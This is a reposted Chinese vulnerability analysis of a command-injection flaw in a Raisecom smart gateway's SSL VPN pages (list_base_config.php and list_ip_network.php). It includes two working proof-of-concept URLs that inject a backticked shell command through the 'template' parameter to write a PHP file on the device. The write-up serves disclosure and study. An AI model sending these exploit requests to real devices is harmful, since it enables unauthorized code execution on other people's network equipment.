漏洞分析
今年看到这个厂商的设备又爆漏洞了,一起分析下这个命令执行漏洞
我们先根据网上的文章定位漏洞文件 list_base_config.php
这里看到可以传入几个参数 type parts pages serch_value,我们往下看这个switch分支的判断条件,想要调用sslvpn_config_mod这个方法的话我们需要按照条件构造参数到这里参数应该是
parts=base_config&type=mod我们进入到这个方法中,看到了几个exec函数,不过没找到上述传入的 $config_type = 2;在哪,没关系我们直接看这个朴实无华的命令拼接
这里发现传入两个参数都可触发命令拼接我们选择 template 进行传参并带入exec函数执行,
template=`echo+-e+'<?php phpinfo();>'>/www/tmp/phpinfo.php`那么到这里我们的完整poc应该就是
http://127.0.0.1/vpn/list_base_config.php?parts=base_config&type=mod&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/phpinfo.php`
梅开二度
这里我们查看这个方法的调用还有以下几个文件
随便看一个其他的 list_ip_network.php
这里需要满足传参 Nradius_submit为ture的情况下即可,所以poc为
/vpn/list_ip_network.php?Nradius_submit=1&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/info.php`
原文始发于微信公众号(XK Team):瑞斯康达智能网关命令执行漏洞简单分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论